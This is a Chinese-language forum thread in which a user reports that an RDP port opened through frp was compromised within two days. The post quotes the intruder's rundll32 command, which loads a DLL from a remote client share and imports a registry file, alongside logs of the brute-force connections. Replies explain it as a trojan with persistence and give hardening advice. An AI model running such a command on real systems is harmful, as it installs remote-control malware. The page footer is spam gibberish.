3389 端口开了两天，就被人搞了... - V2EX

3389 端口开了两天，就被人搞了... - V2EX

Home Sign Up Sign In

This topic created in 1293 days ago, the information mentioned may be changed or developed.

办公室有台没用的电脑，拿来刷网课。用 frp 打洞，直接开的 3389 端口，用 mstsc 远程控制。才开了 2 天，就被人搞进来了，应该是弱口令的问题。

看到别人的操作记录

请问有人知道这是操作了什么不？

rundll32 \\tsclient\a\a.dll a regedit /s \\tsclient\a\r.reg

frp 服务端日志

2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:38210] 2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:39680] 2022/10/27 06:17:02 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:40964] 2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:42406] 2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:43746] 2022/10/27 06:17:04 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:44924] 2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:46104] 2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:47126] 2022/10/27 06:17:06 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:48130] 2022/10/27 06:17:07 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:49162] 2022/10/27 06:38:56 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:49298] 2022/10/27 06:48:35 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.26.179.7:55213] 2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:37643] 2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:38109] 2022/10/27 07:04:11 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:62334] 2022/10/27 07:12:42 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [185.170.144.46:3172] 2022/10/27 07:13:48 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:56728] 2022/10/27 07:16:39 [I] [control.go:309] [fcd53d7a449ce30e] control writer is closing

20 replies 2022-10-28 18:27:54 +08:00

1

7zlid

Oct 27, 2022 via Android

重装系统吧

2

cndns

Oct 27, 2022

RDP 使用 3389 和 SSH 使用 22 的都是勇士

3

Droog

OP

Oct 27, 2022

@cndns 收到教训了...
@7zlid 估计只有这样了！

4

kingpo

Oct 27, 2022

改下 3389 端口

5

maskerTUI

Oct 27, 2022

弱口令才是真正的问题

6

villivateur

Oct 27, 2022

1

@cndns 用标准端口没有任何问题，比如 SSH ，如果关闭密码登录，只允许 RSA 密钥登录，随便黑客怎样都不可能攻破

7

flexbug

Oct 27, 2022 via iPhone

建议使用向日葵或者 todesk 不要自己创造风险

8

mcluyu

Oct 27, 2022

默认用户名（或者容易猜到的常见用户名）+ 弱口令，至于使用什么端口根本无所谓。

9

vmebeh

Oct 27, 2022 via iPhone

1

套个 wireguard 回来随便用

10

Ufo666

Oct 27, 2022

@cndns 别吓我，我们公司就是 22

11

Droog

OP

Oct 27, 2022

@vmebeh 我试试看。

12

0x73346b757234

Oct 27, 2022

黑阔用 rundll32 白加黑的方式执行了一个恶意 dll 文件，猜测是远控木马。注册表加了个一个记录也许是做了持久化。

13

kongkongye

Oct 27, 2022 via iPhone

我上次也是，用 frp 无密码暴露了 docker

14

ungrown

Oct 27, 2022 via Android

@villivateur #6 rdp 也可以这样吗只允许密钥登录？

15

zero47

Oct 27, 2022

之前用凉心云搭 transmission 远程下载，每次登上去都提示密码错误次数过多，要求重启。什么端口都没用，专门有人恶意扫端口的，还是好好加密比较重要。ssh 用 22 我觉得没问题，用证书加密就好。

16

MasterofNone

Oct 27, 2022

rdp 可以上证书验证吗？

17

swulling

Oct 27, 2022 via iPhone

不要暴露任何控制端口到公网

18

aver4vex

Oct 27, 2022

我现在就是软路由开 wireguard 服务。随便折腾。

19

PerFectTime

Oct 28, 2022

VPN 连回家最安全，商业公司的软件你也不知道里面有没有 0day

20

HFX3389

Oct 28, 2022

About Help Advertise Blog API FAQ Solana 1421 Online Highest 6679

Select Language

创意工作者们的社区

World is powered by solitude

VERSION: 3.9.8.5 98ms UTC 17:05 PVG 01:05 LAX 10:05 JFK 13:05
Do have faith in what you're doing.

ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86